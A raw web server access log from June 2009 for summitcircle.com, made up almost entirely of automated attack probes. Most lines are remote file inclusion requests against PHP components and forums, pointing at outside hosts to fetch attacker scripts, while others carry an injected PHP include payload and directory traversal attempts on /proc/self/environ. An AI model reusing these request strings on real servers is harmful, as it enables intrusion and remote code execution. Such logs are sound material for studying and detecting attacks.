195.34.78.110 - - [28/Jun/2009:20:17:18 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:20:17:46 -0700] "GET /logs/access_090209.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:20:18:03 -0700] "GET /logs/access_090119.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.55.106.228 - - [28/Jun/2009:20:18:34 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:18:56 -0700] "GET /logs/access_090119.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.16.176.26 - - [28/Jun/2009:20:18:59 -0700] "GET /logs/access_090222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:20:19:05 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:19:56 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:26 -0700] "GET /logs/access_090118.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:26 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:27 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:27 -0700] "GET /logs/access_090118.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:20:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:20:44 -0700] "GET /logs/access_090119.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:21:07 -0700] "GET /logs/access_090119.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /logs/access_090119.log//components/com_simpleboard/image_upload.php?sbp=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /logs/access_090119.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:11 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /logs/access_090119.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /logs/access_090119.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:21:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
218.94.6.3 - - [28/Jun/2009:20:21:14 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.94.6.3 - - [28/Jun/2009:20:21:14 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.94.6.3 - - [28/Jun/2009:20:21:17 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:21:48 -0700] "GET /logs/access_090119.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:22:39 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
60.43.229.5 - - [28/Jun/2009:20:22:39 -0700] "GET /logs/access_090413.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:22:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:22:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
218.94.6.3 - - [28/Jun/2009:20:23:11 -0700] "GET /logs/access_090119.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:14 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:14 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:14 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:23:35 -0700] "GET /logs/access_090119.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:23:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:23:36 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:20:23:44 -0700] "GET /logs/access_090119.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:47 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
203.241.231.63 - - [28/Jun/2009:20:23:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mool.vip24.com/vipboard/data/map/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:20:24:32 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.246.98.115 - - [28/Jun/2009:20:24:32 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:24:44 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:24:53 -0700] "GET /logs/access.log%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.americanschoolfes.com/images/rand/1337.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.30.78.220 - - [28/Jun/2009:20:24:58 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:25:10 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:25:14 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:25:36 -0700] "GET /logs/access_090222.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:00 -0700] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:00 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:00 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:02 -0700] "GET /logs/access.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:02 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:02 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
62.15.230.250 - - [28/Jun/2009:20:28:30 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.15.230.250 - - [28/Jun/2009:20:28:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.15.230.250 - - [28/Jun/2009:20:28:30 -0700] "GET /logs/access_090119.log%20%20//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://buminch.org/bbs/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:28:31 -0700] "GET /phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:28:31 -0700] "GET /logs/access_090222.log/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:28:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:33 -0700] "GET /logs/access_090119.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:33 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:37 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:37 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
222.162.115.67 - - [28/Jun/2009:20:28:37 -0700] "GET /logs/access_090119.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:31:04 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:31:04 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:31:04 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:31:04 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:32:09 -0700] "GET /logs/access_081201.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:32:11 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:32:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:20:33:10 -0700] "GET /logs/access_090413.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:20:33:18 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:20:33:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
211.203.180.144 - - [28/Jun/2009:20:33:18 -0700] "GET /index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:20:33:25 -0700] "GET /logs/access_090413.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:20:35:03 -0700] "GET /logs/access_090119.log//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:20:35:37 -0700] "GET /logs/access_090406.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
72.30.78.220 - - [28/Jun/2009:20:41:10 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:20:43:09 -0700] "GET /logs/access_090406.log/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:20:43:09 -0700] "GET /errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:20:43:09 -0700] "GET /logs/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
79.116.143.235 - - [28/Jun/2009:20:43:20 -0700] "GET /logs/access_080407.log HTTP/1.0" 404 275 "http://www.summitcircle.com/logs/access_080407.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "www.summitcircle.com"
79.116.143.235 - - [28/Jun/2009:20:43:22 -0700] "GET / HTTP/1.0" 200 763 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:20:43:35 -0700] "GET /logs/access_090119.log/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:20:45:18 -0700] "GET /logs/access_090413.log/errors.php?error=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:20:46:40 -0700] "GET /logs///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
216.17.99.13 - - [28/Jun/2009:20:46:40 -0700] "GET //vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
216.17.99.13 - - [28/Jun/2009:20:46:40 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
216.17.99.13 - - [28/Jun/2009:20:46:46 -0700] "GET /logs///vwar/backup/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
